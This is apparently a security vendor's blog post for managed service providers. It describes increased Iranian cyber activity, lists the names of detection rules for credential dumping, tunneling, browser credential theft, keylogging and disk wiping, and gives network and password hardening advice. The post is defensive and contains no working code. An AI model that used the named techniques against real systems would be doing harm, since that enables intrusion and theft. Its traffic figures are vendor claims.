Just before the start of the conflict in the Middle East, Barracuda Managed XDR’s global Security Operations Center (SOC) observed a sharp surge in cyber activity—specifically, a ten‑fold increase in malicious traffic coming from Iran and targeting the United States.
To stay ahead of these elevated risks, the Managed XDR SOC team is operating in a heightened alert posture, delivering continuous threat monitoring and proactive threat hunting on behalf of our MSP partners and their customers.
What MSPs need to know
The SOC team is continuously tracking how the threat landscape is shifting and is layering additional protections as new intelligence emerges.
The team is actively integrating verified malicious indicators—domains, IP addresses, URLs, and more—tied to Iranian cyber activity into the Barracuda threat intelligence platform. This platform already contains roughly 14 billion indicators of compromise, including new intelligence associated with the current Middle East conflict.
As new threats are identified, customer environments are immediately scanned.
In addition, the security rules and detections for Barracuda Managed XDR Endpoint Security are continuously being updated. If your customers use managed Endpoint Security (with SentinelOne), now is a great time to ensure Platform Detection Library rules are activated to maximize coverage and protection.
Threat categories & key detections
These rules are actively helping MSPs protect customers from threats associated with Iranian cyber groups and related activity:
MuddyWater
- Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading
Detects DLL drops associated with MuddyWater espionage tactics.
Credential dumping
- Suspicious Task Creation for Credential Harvesting
- Python-Based Network Exploitation Tool
- Potential LSASS Dumping Tools
- Credential Dumping via Shadow Copy
- Interactive NTDS Harvesting via VSS
- Cached Domain Credential Dumping (cmdkey.exe)
Tunneling & remote access
- Ngrok Domain Contacted
- Cloudflare Persistent Tunnel Establishment Detected
- Anomalous Process Initiating Cloudflare Tunnel Traffic
Collection & exfiltration
- Keylogging Script via PowerShell
- Chromium Browser Info Stealer via Remote Debugging
- Browser Credential and Cookie Data Access Attempt
PowerShell / script abuse
- PowerShell Script Execution via Time‑Based IPv4
- Suspicious Usage of .NET Reflection via PowerShell
- Encoded PowerShell Launching Command Line Download
Defense evasion, discovery & impact
- Potential DLL Sideloading in PerfLogs Directory
- Disk Data Wipe Attempt via dd Utility
- Boot Configuration Tampering via BCDEdit
- BloodHound Active Directory Reconnaissance File Creation
Practical security measures for all organizations
While Barracuda Managed XDR delivers deep, 24/7 cyber resilience, MSPs can further strengthen protection with the following best practices during periods of elevated geopolitical risk.
Network security
- Implement country‑level blocking for geographies where the business does not operate.
- Disable public‑facing RDP, enforce multifactor authentication, and monitor for unusual login patterns. Lock accounts after 3–5 failed attempts.
- Replace direct RDP access with virtual desktop infrastructure (VDI) where possible.
- Disable unused remote access ports.
- Apply network segmentation to limit lateral movement.
- Use privileged access workstations (PAWs) for administrative tasks.
Firewall settings
- Review all inbound/outbound rules.
- Remove any “permit any” rules.
- Document and justify all external access.
- Closely review rules allowing access from foreign IP ranges.
Password policies
- Enforce 14‑character passwords with full complexity.
- Prevent password reuse and consider 60–90 day rotation windows.
Additional essential measures
- Prioritize software updates.
- Remove unauthorized or unnecessary apps from corporate devices.
- Pay special attention to remote access tools like TeamViewer and AnyDesk.
- Audit legitimate admin tools (PSExec, PowerShell ISE) for potential misuse.
- Ensure backups are isolated, tested, and include offline copies.
- Review and update the organization’s incident response plan.
For further assistance, reach out to the Barracuda Managed XDR team to see how they can help.
Photo: Summit Art Creations / Shutterstock
This post originally appeared on Smarter MSP.